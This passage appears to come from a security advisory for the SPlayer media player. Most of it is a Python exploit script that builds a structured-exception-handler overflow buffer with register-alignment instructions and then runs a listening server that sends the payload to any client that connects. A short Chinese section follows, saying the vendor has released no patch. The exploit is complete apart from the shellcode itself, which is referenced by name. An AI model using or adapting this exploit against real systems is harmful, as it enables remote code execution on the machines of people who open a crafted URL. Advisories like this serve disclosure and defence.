#Begin evil buffer
evil = "\x41" * 2073
evil += "\x61\x73" #popad/nop align
evil += "\x25\x73" #SE handler - ppr/splayer.exe [0x00730025]
#Close the blinds
evil += "\x73" #nop/align
evil += "\x55" #push ebp
evil += "\x73" #nop/align
evil += "\x58" #pop eax
evil += "\x73" #nop/align
#Align to EAX/execute shellcode
evil += "\x05\x19\x11" #add eax, 0x11001900
evil += "\x73" #nop/align
evil += "\x2d\x11\x11" #sub eax, 0x11001100
evil += "\x73" #nop/align
evil += "\x50" #push eax
evil += "\x73" #nop/align
evil += "\xc3" #ret
evil += "\x46" * 1004 #align shellcode->EAX
#End evil buffer
padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"
payload = pre + evil + calcshell + padding
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((bindaddr, bindport))
s.listen(5)
print "[+] Listening for incoming connections on port: %d" % bindport + " ..."
except:
print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
sys.exit()
# Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
# and it crashes after the second request
while 1:
(clientsock, address) = s.accept()
print "[*] New connection from", address[0]
clientsock.recv(1024)
sent = clientsock.send(payload)
print "[+] Payload sent successfully [size: %d bytes]" % sent
sent = 0
print "[-] Closing connection to", address[0]
clientsock.close()
if __name__ == "__main__":
Client().about()
Client().run()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Splayer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: